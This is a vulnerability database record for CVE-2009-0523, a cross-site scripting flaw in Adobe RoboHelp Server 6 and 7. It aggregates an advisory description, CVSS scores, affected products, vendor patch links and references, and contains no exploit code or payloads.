Sign-up

ID

VAR-200902-0563


CVE

CVE-2009-0523


TITLE

Adobe RoboHelp Server Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2009-001101

DESCRIPTION

Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled when displaying the Help Errors log. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Adobe RoboHelp Server 6 and 7 are vulnerable. ---------------------------------------------------------------------- Did you know? Our assessment and impact rating along with detailed information such as exploit code availability, or if an updated patch is released by the vendor, is not part of this mailing-list? Click here to learn more about our commercial solutions: http://secunia.com/advisories/business_solutions/ Click here to trial our solutions: http://secunia.com/advisories/try_vi/ ---------------------------------------------------------------------- TITLE: Adobe RoboHelp Server Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA34048 VERIFY ADVISORY: http://secunia.com/advisories/34048/ DESCRIPTION: Some vulnerabilities have been reported in Adobe RoboHelp Server, which can be exploited by malicious people to conduct cross-site scripting attacks. 1) Certain unspecified input is not properly sanitised before being returned to the user. Successful exploitation requires that the attacker has access to the RoboHelp Help Errors log or is able to trick a victim possessing the required permissions into following a malicious URL. 2) Input passed to unspecified parameters is not properly sanitised before being returned to the user. SOLUTION: Apply patches and regenerate the RoboHelp content. See vendor's advisory for additional details. PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Greg Patton, PropertyInfo Corporation 2) The vendor credits Robert Fly, SalesForce.com ORIGINAL ADVISORY: Adobe APSB09-02: http://www.adobe.com/support/security/bulletins/apsb09-02.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Trust: 1.98

sources: NVD: CVE-2009-0523 // JVNDB: JVNDB-2009-001101 // BID: 33887 // PACKETSTORM: 75199

AFFECTED PRODUCTS

vendor:adobemodel:robohelp serverscope:eqversion:7

Trust: 2.7

vendor:adobemodel:robohelp serverscope:eqversion:6

Trust: 2.7

vendor:adobemodel:robohelpscope:eqversion:7

Trust: 1.6

vendor:adobemodel:robohelpscope:eqversion:6

Trust: 1.6

vendor:hitachimodel:device managerscope:eqversion:software

Trust: 0.8

vendor:hitachimodel:it operations directorscope: - version: -

Trust: 0.8

vendor:hitachimodel:replication managerscope:eqversion:software

Trust: 0.8

vendor:hitachimodel:tiered storage managerscope:eqversion:software

Trust: 0.8

vendor:hitachimodel:jp1/it desktop managementscope:eqversion:- manager

Trust: 0.8

sources: BID: 33887 // JVNDB: JVNDB-2009-001101 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2009-0523
value: MEDIUM

Trust: 1.0

NVD: CVE-2009-0523
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-200902-604
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2009-0523
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

sources: JVNDB: JVNDB-2009-001101 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2009-001101 // NVD: CVE-2009-0523

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200902-604

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 75199 // CNNVD: CNNVD-200902-604

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2009-001101

PATCH
title:APSB09-02url:http://www.adobe.com/support/security/bulletins/apsb09-02.html
Trust: 0.8
title:APSB09-02url:http://www.adobe.com/jp/support/security/bulletins/apsb09-02.html
Trust: 0.8
title:HS12-011url:http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-011/index.html
Trust: 0.8
title:HS12-014url:http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-014/index.html
Trust: 0.8
title:HS12-017url:http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-017/index.html
Trust: 0.8
title:HS12-014url:http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-014/index.html
Trust: 0.8
title:HS12-017url:http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-017/index.html
Trust: 0.8
title:HS12-011url:http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-011/index.html
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2009-001101

EXTERNAL IDS
db:NVDid:CVE-2009-0523
Trust: 2.7
db:BIDid:33887
Trust: 2.7
db:SECUNIAid:34048
Trust: 2.5
db:VUPENid:ADV-2009-0512
Trust: 2.4
db:SECTRACKid:1021755
Trust: 2.4
db:XFid:48890
Trust: 1.4
db:JVNDBid:JVNDB-2009-001101
Trust: 0.8
db:CNNVDid:CNNVD-200902-604
Trust: 0.6
db:PACKETSTORMid:75199
Trust: 0.1
sources:
            
            
            BID: 33887 // 
            
            
            
            JVNDB: JVNDB-2009-001101 // 
            
            
            
            PACKETSTORM: 75199 // 
            
            
            
            CNNVD: CNNVD-200902-604 // 
            
            
            
            NVD: CVE-2009-0523

REFERENCES
url:http://secunia.com/advisories/34048
Trust: 2.4
url:http://www.securityfocus.com/bid/33887
Trust: 2.4
url:http://securitytracker.com/id?1021755
Trust: 2.4
url:http://www.vupen.com/english/advisories/2009/0512
Trust: 2.4
url:http://www.adobe.com/support/security/bulletins/apsb09-02.html
Trust: 2.0
url:http://xforce.iss.net/xforce/xfdb/48890
Trust: 1.4
url:https://exchange.xforce.ibmcloud.com/vulnerabilities/48890
Trust: 1.0
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0523
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-0523
Trust: 0.8
url:http://www.adobe.com/products/robohelpserver/
Trust: 0.3
url:http://secunia.com/advisories/secunia_security_advisories/
Trust: 0.1
url:http://secunia.com/advisories/business_solutions/
Trust: 0.1
url:http://secunia.com/advisories/try_vi/
Trust: 0.1
url:http://secunia.com/advisories/34048/
Trust: 0.1
url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Trust: 0.1
url:http://secunia.com/advisories/about_secunia_advisories/
Trust: 0.1
sources:
            
            
            BID: 33887 // 
            
            
            
            JVNDB: JVNDB-2009-001101 // 
            
            
            
            PACKETSTORM: 75199 // 
            
            
            
            CNNVD: CNNVD-200902-604 // 
            
            
            
            NVD: CVE-2009-0523

CREDITS
Greg Patton
Trust: 0.6
sources:
            
            
            CNNVD: CNNVD-200902-604

SOURCES
db:BIDid:33887
db:JVNDBid:JVNDB-2009-001101
db:PACKETSTORMid:75199
db:CNNVDid:CNNVD-200902-604
db:NVDid:CVE-2009-0523

LAST UPDATE DATE
2024-11-23T22:23:50.995000+00:00

SOURCES UPDATE DATE
db:BIDid:33887date:2009-02-24T23:17:00
db:JVNDBid:JVNDB-2009-001101date:2012-06-27T00:00:00
db:CNNVDid:CNNVD-200902-604date:2009-02-27T00:00:00
db:NVDid:CVE-2009-0523date:2024-11-21T01:00:09.167

SOURCES RELEASE DATE
db:BIDid:33887date:2009-02-24T00:00:00
db:JVNDBid:JVNDB-2009-001101date:2009-03-27T00:00:00
db:PACKETSTORMid:75199date:2009-02-25T15:46:37
db:CNNVDid:CNNVD-200902-604date:2009-02-26T00:00:00
db:NVDid:CVE-2009-0523date:2009-02-26T16:17:19.967